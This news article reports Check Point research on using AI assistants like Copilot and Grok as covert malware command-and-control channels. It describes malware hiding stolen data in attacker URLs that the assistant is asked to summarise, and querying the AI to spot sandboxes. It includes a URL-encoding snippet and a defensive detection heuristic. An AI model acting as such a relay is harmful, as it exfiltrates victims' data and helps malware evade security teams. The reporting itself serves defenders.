
Experts Warn: AI Assistants Like Copilot, Grok Can Be Hijacked for Malware Operations

Check Point warns that hackers can exploit AI tools like Microsoft Copilot and xAI Grok to conceal malware operations, posing a significant cybersecurity threat.

Check Point has issued a warning about the potential misuse of Generative Artificial Intelligence (GenAI) tools as command-and-control (C2) infrastructure by cybercriminals. According to the cybersecurity firm, these tools can effectively obscure malicious traffic: by encoding data into URLs the attacker controls, malware can use AI queries to relay sensitive information without triggering security alerts.
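
The encoding step itself is ordinary URL construction. As a minimal illustration of how stolen bytes can be tucked into a query parameter that looks like routine telemetry (the domain and payload here are hypothetical, not taken from Check Point's research):

```python
import base64
from urllib.parse import urlencode

def encode_into_url(base_url: str, payload: bytes) -> str:
    """Hide arbitrary bytes inside an ordinary-looking query parameter.

    Illustration only: the domain and the 'data' parameter name are
    hypothetical examples, not a real attacker's infrastructure.
    """
    # URL-safe base64 keeps the value free of characters that need escaping.
    token = base64.urlsafe_b64encode(payload).decode("ascii")
    return f"{base_url}?{urlencode({'data': token})}"

url = encode_into_url("http://malicious-site.example/report",
                      b"hostname=HR-LAPTOP-07")
print(url)
```

Nothing in such a URL overtly signals exfiltration; only the length and randomness of the parameter value hint that it carries encoded data rather than a normal identifier.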

In its latest research, Check Point highlighted that platforms such as Microsoft Copilot and xAI Grok are particularly exposed to this kind of abuse. Deploying malware is only part of the equation; the harder challenge is directing that malware and relaying its results over the network. The ability to blend malicious traffic with legitimate data is a hallmark of high-quality malware, and AI assistants can now facilitate that blending.

When a device is compromised, the malware can harvest sensitive data and system information, encode it, and embed it in an attacker-controlled URL. For instance, a URL might look like http://malicious-site.com/report?data=12345678, where the “data=” parameter carries the encoded information. The malware then prompts the AI assistant with a request such as “Summarize the contents of this website.” The assistant fetches the attacker's URL, delivering the encoded payload, and because the request itself is legitimate AI traffic, it evades detection by security solutions.
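
On the defensive side, one heuristic is to flag URLs inside AI prompts whose query values look like encoded blobs, since base64-style payloads have markedly higher character entropy than ordinary parameters. A minimal sketch; the 3.5-bit threshold, minimum length, and regular expressions are illustrative assumptions, not a production-ready rule:

```python
import math
import re
from collections import Counter

def shannon_entropy(s: str) -> float:
    """Bits of entropy per character of the string."""
    counts = Counter(s)
    n = len(s)
    return -sum((c / n) * math.log2(c / n) for c in counts.values())

def suspicious_urls(prompt: str, threshold: float = 3.5,
                    min_len: int = 16) -> list:
    """Return URLs in the prompt whose query values look like encoded data.

    Thresholds are illustrative assumptions; real tooling would tune them
    against observed traffic to balance false positives.
    """
    flagged = []
    for url in re.findall(r"https?://\S+", prompt):
        # Capture each query-parameter value (base64-like character set).
        for value in re.findall(r"[?&][\w-]+=([A-Za-z0-9+/_=-]+)", url):
            if len(value) >= min_len and shannon_entropy(value) >= threshold:
                flagged.append(url)
                break
    return flagged
```

A short “id=12345” passes untouched, while a long high-entropy “data=aG9zdG5h…” value trips the heuristic, giving a security gateway a reason to inspect the request before the AI fetches the page.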

The situation becomes more precarious when the malware queries the AI for further instructions based on the harvested data. For example, it can ask whether it is operating inside a high-value enterprise environment or merely a sandbox designed for testing. If the response suggests a sandbox, the malware can go dormant to avoid detection; otherwise, it can launch the second stage of its operation.

Check Point concludes that once an AI service can serve as a “stealthy transport layer,” the same interface can also carry prompts and model outputs, effectively acting as an external decision engine. This paves the way for AI-driven implants and C2 systems that automate triage, targeting, and operational decisions in real time. The implications are significant: such tooling could make cyber threats markedly more adaptive and harder to detect.

The evolving nature of cyber threats, especially those utilizing advanced technologies like GenAI, underscores the need for enhanced cybersecurity measures. Organizations must remain vigilant to safeguard their systems against increasingly sophisticated attacks leveraging AI capabilities. As hackers continue to innovate, the challenge for cybersecurity professionals will be to stay ahead of the curve, developing tools and strategies to counteract these emerging threats effectively.

Written By Rachel Torres



© 2025 AIPressa · Part of Buzzora Media · All rights reserved.